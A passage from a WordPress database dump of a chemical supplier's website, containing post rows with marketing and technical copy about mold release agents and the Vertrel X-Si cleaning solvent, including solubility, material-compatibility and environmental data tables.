href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>\r\n\r\nWe have focused on taking the message to our customers that more is not necessarily better when it comes to applying mold release agents. Today’s highly sophisticated water-based or solvent-based Semi-permanent mold release agents ( Urethane mold release agent ) technologies do more with less:\r\n<ul>\r\n 	<li>You can obtain many mold releases between applications</li>\r\n 	<li>More molding cycles can be attained per working shift due to efficient release ease and the need to apply the release system less frequently</li>\r\n 	<li>Low product application levels result in a cleaner working environment</li>\r\n 	<li>Scrap can be significantly reduced</li>\r\n 	<li>Molds can remain in production for extended periods of time due to the low contribution by the release system itself to in-mold build-up and the extremely high mold protection properties provided</li>\r\n 	<li>Complicated parts can be made in a trouble-free manner since products with elevated lubricity can be specified where appropriate</li>\r\n 	<li>Molded parts retain consistently good cosmetic appearance</li>\r\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\r\n</ul>', 'ReleaSys 8900 | Urethane Mold Release Agent', 'ReleaSys 8900 is a solvent-based, semi-permanent mold release agent designed to provide superior durability and high slip across a broad range of moldable substrates. This formulation is particularly effective on difficult molding application or abrasive substrates.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up. Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>High Slip;Ideal for complex mold geometries</li>\r\n 	<li>Ideal for Composites and Urethanes</li>\r\n 	<li>Fast evaporation and cure time</li>\r\n 	<li>Minimal mold build up</li>\r\n</ul>', 'inherit', 'closed', 'closed', '', '310-autosave-v1', '', '', '2017-06-08 18:05:53', '2017-06-08 18:05:53', '', 310, 'https://www.miller-stephenson.com/310-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2339, 3, '2016-10-06 19:31:40', '2016-10-06 19:31:40', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-06 19:31:40', '2016-10-06 19:31:40', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2340, 49, '2016-10-06 19:46:56', '2016-10-06 19:46:56', '', '', '', 'publish', 'closed', 'closed', '', '2340', '', '', '2016-10-06 19:46:56', '2016-10-06 19:46:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/2340/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2341, 0, '2016-10-06 21:44:54', '2016-10-06 21:44:54', '', '', '', 'publish', 'closed', 'closed', '', '2341', '', '', '2016-10-06 21:44:54', '2016-10-06 21:44:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/2341/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2342, 0, '2016-10-07 01:26:32', '2016-10-07 01:26:32', '', '', '', 'publish', 'closed', 'closed', '', '2342', '', '', '2016-10-07 01:26:32', '2016-10-07 01:26:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/2342/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2343, 0, '2016-10-07 11:45:38', '2016-10-07 11:45:38', '', '', '', 'publish', 'closed', 'closed', '', '2343', '', '', '2016-10-07 11:45:38', '2016-10-07 11:45:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/2343/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2344, 2, '2016-10-07 13:03:51', '2016-10-07 13:03:51', '<strong>Introduction to Vertrel X-Si</strong>\r\n\r\nVertrel X-Si is a proprietary blend of <a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel XF</a> hydrofluorocarbon (2,3-dihydrodecafluoropentane) and hexamethyldisiloxane. It is ideally suited for use in medical applications as a solvent for cleaning or depositing silicone oilbased lubricants. It is also used as a swelling media for silicone rubber tubing.\r\n\r\nVertrel X-Si has “zero” ozone-depletion potential and low global warming potential, and is exempted as a volatile organic compound (VOC). Vertrel X-Si is accepted by the U.S. Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozone-depleting substances. It is an alternative to environmentally regulated fluids such as CFC-113, 1,1,1-trichloroethane\r\n(1,1,1-TCA or methylchloroform), HCFC-141b, and hexane, a VOC. Vertrel X-Si can replace high global warming potential materials like perfluorocarbon (PFC) fluids in similar applications in the medical field. Physical properties of Vertrel X-Si are shown in the <strong>technical data tab.</strong>\r\n\r\n<strong>Process of Use</strong>\r\n\r\nFor most applications using Vertrel X-Si, parts are immersed in the solvent at room temperature. Vertrel X-Si evaporates quickly, thus it is recommended that the vapor-to-air interface area be minimized and/or the solvent be cooled to promote efficient and effective use. Due to flammability characteristics, this product should be used in appropriately rated areas and equipment. If there is a need to use the solvent at higher temperatures, a flammable-rated, single sump vapor degreaser can be used. Vertrel X-Si is not an azeotrope, and should not be used in a two-sump vapor degreaser as components of the blend may separate.\r\n\r\n<strong>Solubility and Swelling</strong>\r\n\r\nLaboratory test data for solubility of common silicone fluids in Vertrel X-Si are shown in Table 1.\r\n\r\n&nbsp;\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="4" width="868"><strong>Table 1</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="4"><strong>Solubility of Typical Silicone Fluids in</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="4"><strong>Vertrel X-Si at Room Temperature</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="4"><strong>(% Oil Loading in Solvent)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil</td>\r\n<td style="text-align: center;">Vertrel X-Si</td>\r\n<td style="text-align: center;">CFC-113</td>\r\n<td style="text-align: center;">Hexane</td>\r\n</tr>\r\n<tr>\r\n<td>DC-200*</td>\r\n<td style="text-align: center;">14</td>\r\n<td style="text-align: center;">19</td>\r\n<td style="text-align: center;">25</td>\r\n</tr>\r\n<tr>\r\n<td>DC-360*</td>\r\n<td style="text-align: center;">21</td>\r\n<td style="text-align: center;">24</td>\r\n<td style="text-align: center;">46</td>\r\n</tr>\r\n<tr>\r\n<td>DC-550*</td>\r\n<td style="text-align: center;">33</td>\r\n<td style="text-align: center;">39</td>\r\n<td style="text-align: center;">58</td>\r\n</tr>\r\n<tr>\r\n<td>DC-1107*</td>\r\n<td style="text-align: center;">45</td>\r\n<td style="text-align: center;">51</td>\r\n<td style="text-align: center;">65</td>\r\n</tr>\r\n<tr>\r\n<td>NuSil Med 4159</td>\r\n<td style="text-align: center;">28</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">31</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*As manufactured by Dow Corning.\r\n\r\nData was also collected to measure swelling of polysilicone tubing. The data shown in Table 2 compares change in width and weight of polysilicone tubing in various solvents with Vertrel X-Si.\r\n\r\n&nbsp;\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="4" width="868"><strong>Table 2</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="4"><strong>Swelling of Polysilicone Tubing</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Test</td>\r\n<td style="text-align: center;">Vertrel X-Si</td>\r\n<td style="text-align: center;">CFC-113</td>\r\n<td style="text-align: center;">Hexane</td>\r\n</tr>\r\n<tr>\r\n<td>At Room Temperature</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>% Change in Width</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">23</td>\r\n</tr>\r\n<tr>\r\n<td>% Change in Weight</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">133</td>\r\n<td style="text-align: center;">83</td>\r\n</tr>\r\n<tr>\r\n<td>At Boiling Point*</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>% Change in Width</td>\r\n<td style="text-align: center;">20</td>\r\n<td style="text-align: center;">20</td>\r\n<td style="text-align: center;">24</td>\r\n</tr>\r\n<tr>\r\n<td>% Change in Weight</td>\r\n<td style="text-align: center;">64</td>\r\n<td style="text-align: center;">144</td>\r\n<td style="text-align: center;">63</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n* 47°C (117°F) for CFC-113; 54°C (129°F) for Vertrel KCD-X-Si; 68°C (154°F) for Hexane\r\n\r\nNote that Vertrel X-Si has similar swelling capability compared with hexane and CFC-113. However, Vertrel X-Si is superior in performance because it results in a much smaller weight gain of the polysilicone tubing due to solvent absorption. This is very desirable from the viewpoint of solvent consumption as well as a faster recovery of the polysilicone tubing to its original state.\r\n\r\n<strong>Plastic and Elastomer Compatibility</strong>\r\n\r\nVertrel X-Si is compatible with most polymeric materials commonly used in the medical application and has excellent compatibility with polycarbonate and polyurethane materials.\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air-drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\r\n\r\nTest data for plastics and elastomers compatibility are summarized in Tables 3 and 4. These tests simulate effects for exposures of parts in a cleaning cycle. Long-term compatibility data simulating exposure of equipment construction materials is available from Miller-Stephenson upon request.\r\n\r\n<strong>Metals and Other Compatibility</strong>\r\n\r\nVertrel X-Si is very stable with most common metals such as aluminum, copper, zinc, carbon steel, and stainless steel.\r\n\r\nContact with highly basic process materials, pH 10 or above, is not recommended.\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Table 3</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Plastic Compatibility</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Immersion: 15 Minutes at Room Temperature</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">Compatible</td>\r\n</tr>\r\n<tr>\r\n<td>Polyethylene</td>\r\n<td style="text-align: center;">ABS</td>\r\n</tr>\r\n<tr>\r\n<td>Polypropylene</td>\r\n<td style="text-align: center;">Acetal</td>\r\n</tr>\r\n<tr>\r\n<td>Polystyrene</td>\r\n<td style="text-align: center;">Acrylic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyester, PET, PBT</td>\r\n<td style="text-align: center;">Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Oxide, PPO</td>\r\n<td style="text-align: center;">Ionomer</td>\r\n</tr>\r\n<tr>\r\n<td>Polyimide, PI, PEI, PAI</td>\r\n<td style="text-align: center;">Liquid Crystal Polymer</td>\r\n</tr>\r\n<tr>\r\n<td>Polyetherketone, PEK</td>\r\n<td style="text-align: center;">Phenolic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyaryletherketone, PEEK</td>\r\n<td style="text-align: center;">PVC, CPVC</td>\r\n</tr>\r\n<tr>\r\n<td>Polysulfone</td>\r\n<td style="text-align: center;">PTFE, ETFE</td>\r\n</tr>\r\n<tr>\r\n<td>Polyarylsulfone</td>\r\n<td style="text-align: center;">Cellulosic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Sulfide, PPS</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Table 4</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Elastomer Compatibility</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Immersion: 15 Minutes at Room Temperature</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Compatible</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Buna N, NBR, Nitrile</td>\r\n<td>Buna S, SBR, GRS</td>\r\n</tr>\r\n<tr>\r\n<td>Butyl Rubber, IIR</td>\r\n<td>Chlorosulfonated PE</td>\r\n</tr>\r\n<tr>\r\n<td>EPM, EPDM, Nordel®</td>\r\n<td>Polysulfide</td>\r\n</tr>\r\n<tr>\r\n<td>Natural Rubber, Isoprene</td>\r\n<td>Neoprene</td>\r\n</tr>\r\n<tr>\r\n<td>Polyurethane</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Incompatible</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Viton® B</td>\r\n<td>Silicone</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nData from acute toxicity studies has demonstrated that Vertrel X-Si has low toxicity. Vertrel X-Si is a slight skin and eye irritant and has low acute inhalation toxicity.<strong>Exposure Limit</strong>\r\n\r\n<strong>Flammability</strong>\r\n\r\nVertrel X-Si exhibits a closed cup flash point per the Pensky-Martens Closed Cup Tester (ASTM D 93) and is classified as a flammable liquid by NFPA or DOT. The product does exhibit vapor flammability limits in air, and has the potential to ignite and burn in an open vessel or in case of a spill, if an ignition source is present. Users should clear equipment of all vapors and liquids before performing any maintenance operations that could result in an ignition source.\r\n\r\nFlash point data and limits of flammability in air provide the user with additional information that should be used as elements of a fire risk assessment and to determine guidelines for the safe handling of volatile chemicals. Users should assure compliance with NFPA standards and local fire codes.\r\n\r\n<strong>Recovery</strong>\r\n\r\nRecovery of Vertrel X-Si is not recommended. The product is not an azeotrope, and composition of the recovered product cannot be assured.\r\n\r\nIf recovery is attempted, flammable rated areas and equipment should be used. The presence of soils may further change the characteristics of the material. Any recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel X-Si to ensure proper classification for waste disposal.\r\n\r\n<strong>Storage/Handling</strong>\r\n\r\nVertrel X-Si is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. If solvent is stored below –10°C (14°F), mix prior to use. Do not allow stored product to exceed 52°C (125°F) to prevent leakage or potential rupture of container from pressure and expansion. Vertrel X-Si is classified as a flammable liquid by DOT/NFPA. It does have flammable limits in air, and has the potential to ignite in an open vessel or in case of a spill, if an ignition source is present. A flammable-rated drum pump is recommended to dispense the product from its container.\r\n\r\n<strong>Environmental Legislation</strong>\r\n\r\nVertrel specialty fluids have “zero” ozonedepletion potential and low global warming potential (Table 5). They are used as alternatives to CFC-113, methylchloroform, hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\r\n\r\nVertrel® X-Si is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozonedepleting substances. Vertrel XF and hexamethyldisiloxane are exempt from classification as volatile organic compounds (VOCs) by the EPA. Vertrel X-Si is also VOC compliant under the California South Coast Air Quality Management District (SCAQMD) regulations, which require VOC content less than 50 g/L of solvent.\r\n\r\nThe components of Vertrel X-Si are listed in the TSCA inventory. One component, HFC-43-10mee, is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See MSDS Regulatory Section.\r\n\r\nVertrel X-Si is not a hazardous air pollutant (HAP), and therefore not subject to NESHAP regulation. DuPont Vertrel X-Si is not included in the SARA Title III Section 313 list of toxic chemicals, and is not subject to SARA Title III (EPCRA) reporting requirements.\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Table 5</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Environmental Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Property</td>\r\n<td style="text-align: center;">Vertrel X-Si</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone-Depletion Potential (ODP)</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming Potential (GWP/100 yr ITH)*</td>\r\n<td style="text-align: center;">741</td>\r\n</tr>\r\n<tr>\r\n<td>Volatile Organic Compounds (VOC, g/L)</td>\r\n<td style="text-align: center;">Exempt</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Specifications</strong>\r\n\r\nComposition and specifications are shown in Table 6. All components are listed in the TSCA Inventory.\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Table 6</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Vertrel X-Si Specifications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Vertrel XF, wt%</td>\r\n<td style="text-align: center;">57.0 ±1.0</td>\r\n</tr>\r\n<tr>\r\n<td>Hexamethyldisiloxane, wt%</td>\r\n<td style="text-align: center;">43.0 ±1.0</td>\r\n</tr>\r\n<tr>\r\n<td>Nonvolatile Residue, ppm wt</td>\r\n<td style="text-align: center;">10 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Moisture, ppm wt</td>\r\n<td style="text-align: center;">200 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Clear, Colorless</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">Click here to learn more about Vertrel fluids.</a>', 'Vertrel X-Si', 'Vertrel X-Si is ideally suited for use in medical applications as a solvent for cleaning or depositing silicone oil based lubricants. It is also used as a swelling media for silicone rubber tubing.', 'publish', 'closed', 'closed', '', 'vertrel-x-si', '', '', '2016-10-13 17:05:34', '2016-10-13 17:05:34', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2344', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2345, 50, '2016-10-07 12:26:09', '2016-10-07 12:26:09', '', '', '', 'publish', 'closed', 'closed', '', '2345', '', '', '2016-10-07 12:26:09', '2016-10-07 12:26:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/2345/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2349, 2, '2016-10-07 12:59:21', '2016-10-07 12:59:21', '', 'Vertrel X-Si', '', 'inherit', 'closed', 'closed', '', 'shutterstock_470033000', '', '', '2016-10-07 12:59:33', '2016-10-07 12:59:33', '', 2344, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_470033000.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2350, 2, '2016-10-07 13:09:22', '2016-10-07 13:09:22', '<strong>Introduction to Vertrel X-Si</strong>\n\nVertrel X-Si is a proprietary blend of Vertrel XF hydrofluorocarbon (2,3-dihydrodecafluoropentane) and hexamethyldisiloxane. It is ideally suited for use in medical applications as a solvent for cleaning or depositing silicone oilbased lubricants. It is also used as a swelling media for silicone rubber tubing.\n\nVertrel X-Si has “zero” ozone-depletion potential and low global warming potential, and is exempted as a volatile organic compound (VOC). Vertrel X-Si is accepted by the U.S. Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozone-depleting substances. It is an alternative to environmentally regulated fluids such as CFC-113, 1,1,1-trichloroethane\n(1,1,1-TCA or methylchloroform), HCFC-141b, and hexane, a VOC. Vertrel X-Si can replace high global warming potential materials like perfluorocarbon (PFC) fluids in similar applications in the medical field. Physical properties of Vertrel X-Si are shown in the <strong>technical data tab.</strong>\n\n<strong>Process of Use</strong>\n\nFor most applications using Vertrel X-Si, parts are immersed in the solvent at room temperature. Vertrel X-Si evaporates quickly, thus it is recommended that the vapor-to-air interface area be minimized and/or the solvent be cooled to promote efficient and effective use. Due to flammability characteristics, this product should be used in appropriately rated areas and equipment. If there is a need to use the solvent at higher temperatures, a flammable-rated, single sump vapor degreaser can be used. Vertrel X-Si is not an azeotrope, and should not be used in a two-sump vapor degreaser as components of the blend may separate.\n\n<strong>Solubility and Swelling</strong>\n\nLaboratory test data for solubility of common silicone fluids in Vertrel X-Si are shown in Table 1.\n\n&nbsp;\n<table width="868">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="4" width="868">Table 1</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="4">Solubility of Typical Silicone Fluids in</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="4">Vertrel X-Si at Room Temperature</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="4">(% Oil Loading in Solvent)</td>\n</tr>\n<tr>\n<td>Oil</td>\n<td style="text-align: center;">Vertrel X-Si</td>\n<td style="text-align: center;">CFC-113</td>\n<td style="text-align: center;">Hexane</td>\n</tr>\n<tr>\n<td>DC-200*</td>\n<td style="text-align: center;">14</td>\n<td style="text-align: center;">19</td>\n<td style="text-align: center;">25</td>\n</tr>\n<tr>\n<td>DC-360*</td>\n<td style="text-align: center;">21</td>\n<td style="text-align: center;">24</td>\n<td style="text-align: center;">46</td>\n</tr>\n<tr>\n<td>DC-550*</td>\n<td style="text-align: center;">33</td>\n<td style="text-align: center;">39</td>\n<td style="text-align: center;">58</td>\n</tr>\n<tr>\n<td>DC-1107*</td>\n<td style="text-align: center;">45</td>\n<td style="text-align: center;">51</td>\n<td style="text-align: center;">65</td>\n</tr>\n<tr>\n<td>NuSil Med 4159</td>\n<td style="text-align: center;">28</td>\n<td style="text-align: center;">29</td>\n<td style="text-align: center;">31</td>\n</tr>\n</tbody>\n</table>\n*As manufactured by Dow Corning.\n\nData was also collected to measure swelling of polysilicone tubing. The data shown in Table 2 compares change in width and weight of polysilicone tubing in various solvents with Vertrel X-Si.\n\n&nbsp;\n<table width="868">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="4" width="868">Table 2</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="4">Swelling of Polysilicone Tubing</td>\n</tr>\n<tr>\n<td>Test</td>\n<td style="text-align: center;">Vertrel X-Si</td>\n<td style="text-align: center;">CFC-113</td>\n<td style="text-align: center;">Hexane</td>\n</tr>\n<tr>\n<td>At Room Temperature</td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>% Change in Width</td>\n<td style="text-align: center;">15</td>\n<td style="text-align: center;">16</td>\n<td style="text-align: center;">23</td>\n</tr>\n<tr>\n<td>% Change in Weight</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">133</td>\n<td style="text-align: center;">83</td>\n</tr>\n<tr>\n<td>At Boiling Point*</td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>% Change in Width</td>\n<td style="text-align: center;">20</td>\n<td style="text-align: center;">20</td>\n<td style="text-align: center;">24</td>\n</tr>\n<tr>\n<td>% Change in Weight</td>\n<td style="text-align: center;">64</td>\n<td style="text-align: center;">144</td>\n<td style="text-align: center;">63</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n* 47°C (117°F) for CFC-113; 54°C (129°F) for Vertrel KCD-X-Si; 68°C (154°F) for Hexane\n\nNote that Vertrel X-Si has similar swelling capability compared with hexane and CFC-113. However, Vertrel X-Si is superior in performance because it results in a much smaller weight gain of the polysilicone tubing due to solvent absorption. This is very desirable from the viewpoint of solvent consumption as well as a faster recovery of the polysilicone tubing to its original state.\n\n<strong>Plastic and Elastomer Compatibility</strong>\n\nVertrel X-Si is compatible with most polymeric materials commonly used in the medical application and has excellent compatibility with polycarbonate and polyurethane materials.\n\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air-drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\n\nTest data for plastics and elastomers compatibility are summarized in Tables 3 and 4. These tests simulate effects for exposures of parts in a cleaning cycle. Long-term compatibility data simulating exposure of equipment construction materials is available from Miller-Stephenson upon request.\n\n<strong>Metals and Other Compatibility</strong>\n\nVertrel X-Si is very stable with most common metals such as aluminum, copper, zinc, carbon steel, and stainless steel.\n\nContact with highly basic process materials, pH 10 or above, is not recommended.\n<table width="456">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="2" width="456"><strong>Table 3</strong></td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2">Plastic Compatibility</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2">Immersion: 15 Minutes at Room Temperature</td>\n</tr>\n<tr>\n<td colspan="2">Compatible</td>\n</tr>\n<tr>\n<td>Polyethylene</td>\n<td style="text-align: center;">ABS</td>\n</tr>\n<tr>\n<td>Polypropylene</td>\n<td style="text-align: center;">Acetal</td>\n</tr>\n<tr>\n<td>Polystyrene</td>\n<td style="text-align: center;">Acrylic</td>\n</tr>\n<tr>\n<td>Polyester, PET, PBT</td>\n<td style="text-align: center;">Epoxy</td>\n</tr>\n<tr>\n<td>Polyphenylene Oxide, PPO</td>\n<td style="text-align: center;">Ionomer</td>\n</tr>\n<tr>\n<td>Polyimide, PI, PEI, PAI</td>\n<td 